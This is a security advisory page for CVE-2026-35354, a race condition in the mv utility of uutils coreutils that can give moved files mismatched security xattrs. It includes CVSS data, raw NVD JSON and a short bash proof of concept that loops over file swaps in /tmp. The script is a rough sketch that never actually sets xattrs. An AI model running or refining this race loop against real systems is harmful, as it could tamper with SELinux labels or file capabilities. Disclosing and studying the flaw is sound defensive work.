Security Vulnerability Report
CVE-2026-35354 CVSS 4.7 MEDIUM

Published: 2026-04-22 17:16:38
Last Modified: 2026-04-24 19:04:09

Description

A Time-of-Check to Time-of-Use (TOCTOU) vulnerability exists in the mv utility of uutils coreutils during cross-device moves. The extended attribute (xattr) preservation logic uses multiple path-based system calls that perform fresh path-to-inode lookups for each operation. A local attacker with write access to the directory can exploit this race to swap files between calls, causing the destination file to receive an inconsistent mix of security xattrs, such as SELinux labels or file capabilities.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:* - VULNERABLE
uutils coreutils (specific vulnerable version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# PoC for CVE-2026-35354: TOCTOU in uutils coreutils mv
# This script attempts to exploit the race condition during cross-device moves.

TARGET_DIR="/tmp/cve_test"
SRC_FILE="$TARGET_DIR/secret_file"
DST_FILE="$TARGET_DIR/public_file"

# Setup: Create files with different extended attributes
mkdir -p "$TARGET_DIR"
touch "$SRC_FILE" "$DST_FILE"

# Set a restrictive SELinux label (simulated) on the source file
# In a real exploit, this would be a sensitive security context
echo "Setting sensitive xattr on source file..."
# user.security.label="high_security"

# The victim runs a cross-device move (simulated loop)
# Attacker runs this swap loop concurrently
echo "Starting race condition attack..."
while true; do
    # Check if mv is in progress (heuristic)
    # Swap the files between the check and use of xattrs
    mv "$DST_FILE" "$TARGET_DIR/temp_swap" && \
    mv "$SRC_FILE" "$DST_FILE" && \
    mv "$TARGET_DIR/temp_swap" "$SRC_FILE"
    # Sleep briefly to allow CPU for mv process
    sleep 0.001
done

References

https://github.com/uutils/coreutils/issues/10014 (Exploit, Issue Tracking, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35354", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:37.867", "lastModified": "2026-04-24T19:04:08.917", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Time-of-Check to Time-of-Use (TOCTOU) vulnerability exists in the mv utility of uutils coreutils during cross-device moves. The extended attribute (xattr) preservation logic uses multiple path-based system calls that perform fresh path-to-inode lookups for each operation. A local attacker with write access to the directory can exploit this race to swap files between calls, causing the destination file to receive an inconsistent mix of security xattrs, such as SELinux labels or file capabilities."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-367"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:*", "matchCriteriaId": "4A9AF9E4-E17C-48AD-8051-B49998618839"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/issues/10014", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/uutils/coreutils/issues/10014", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}